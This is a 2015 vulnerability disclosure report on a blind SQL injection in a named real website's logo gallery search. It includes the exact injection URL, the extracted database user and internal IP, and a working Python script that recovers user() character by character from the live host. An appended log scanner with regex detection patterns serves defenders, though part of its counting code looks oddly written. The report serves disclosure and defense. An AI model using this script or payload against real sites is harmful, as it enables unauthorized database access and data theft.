
MySQL boolean-based blind SQL injection on a Zhubajie.com site (with verification script)

2015-03-19 07:30

Injection point:

http://en.zhubajie.com/logo-design/gallery?tagsearch=11'XOR(length(user())=120)OR'bb



The tagsearch parameter is injectable: MySQL boolean-based blind injection.

Keyword in the response that indicates a False condition: No matched winning logo designs

Proof of vulnerability:

Guessing user() character by character yields:

enshop@192.168.10.3



[Screenshot: zhubajie.mysqli.png]



Verification script:

#encoding=gbk
import httplib
import sys

headers = {
    'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}

# Character set to guess from: lowercase letters, digits and the @ _ . found in a user@host value
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')

print 'start to retrieve MySQL user:'
user = ''
for i in range(1, 21, 1):          # positions 1..20 of user()
    for payload in payloads:
        conn = httplib.HTTPConnection('en.zhubajie.com', timeout=60)
        # Boolean condition: is character i of lower(user()) equal to this guess?
        s = "ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payload))
        conn.request(method='GET',
                     url="/logo-design/gallery?tagsearch=11'XOR(" + s + ")OR'bb",
                     headers=headers)
        html_doc = conn.getresponse().read()
        conn.close()
        # The "no match" text only appears when the injected condition is False
        if html_doc.find('No matched winning logo designs') < 0:
            user += payload
            sys.stdout.write('\r[In progress] %s' % user)
            sys.stdout.flush()
            break
        else:
            print '.',

print '\n[Done]MySQL user is', user

Fix:

Filter the parameter.
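Added here as a defender-side example, not part of the original WooYun report: a small access-log scanner that recognises the probe shape the script above sends (a quote followed by XOR(...)OR' inside a query parameter) and counts how many such probes each client fires at the same path, since the script issues up to 39 requests per recovered character. The log lines are constructed samples; the regexes and function names are my own.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the original report): three probes of the
# kind the verification script sends, plus one benign search on the same endpoint.
SAMPLE_LOG = """\
203.0.113.5 - - [19/Mar/2015:07:30:01 +0800] "GET /logo-design/gallery?tagsearch=11'XOR(ascii(mid(lower(user()),1,1))=97)OR'bb HTTP/1.1" 200 5120
203.0.113.5 - - [19/Mar/2015:07:30:02 +0800] "GET /logo-design/gallery?tagsearch=11'XOR(ascii(mid(lower(user()),1,1))=98)OR'bb HTTP/1.1" 200 5120
203.0.113.5 - - [19/Mar/2015:07:30:03 +0800] "GET /logo-design/gallery?tagsearch=11%27XOR%28length%28user%28%29%29%3D120%29OR%27bb HTTP/1.1" 200 5120
198.51.100.7 - - [19/Mar/2015:07:31:10 +0800] "GET /logo-design/gallery?tagsearch=11 HTTP/1.1" 200 9876
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$')
# Boolean-blind probe shape from the report: a closing quote, then XOR/OR/AND and an opening parenthesis.
BLIND_RE = re.compile(r"'\s*(xor|or|and)\s*\(", re.IGNORECASE)

def parse_line(line):
    """Split one combined-format log line into client IP, path and decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group('url'))
    return {'ip': m.group('ip'), 'path': url.path, 'params': parse_qs(url.query)}

def is_blind_probe(value):
    """True when a parameter value looks like the quote-XOR(...)OR' payload."""
    return bool(BLIND_RE.search(value))

def find_probes(log_text):
    """Return (ip, parameter, value) for every request carrying a boolean-blind payload."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        for name, values in rec['params'].items():
            hits.extend((rec['ip'], name, v) for v in values if is_blind_probe(v))
    return hits

def probe_counts(log_text):
    """Per (client, path) count of probes; a character-by-character extraction shows up as a burst."""
    counts = defaultdict(int)
    for ip, _name, _value in find_probes(log_text):
        counts[(ip, '/logo-design/gallery')] += 0  # keep keys stable for paths seen below
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and any(is_blind_probe(v) for vs in rec['params'].values() for v in vs):
            counts[(rec['ip'], rec['path'])] += 1
    return dict(counts)
```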

Source: www.wooyun.org/bugs/wooyun-2015-095083
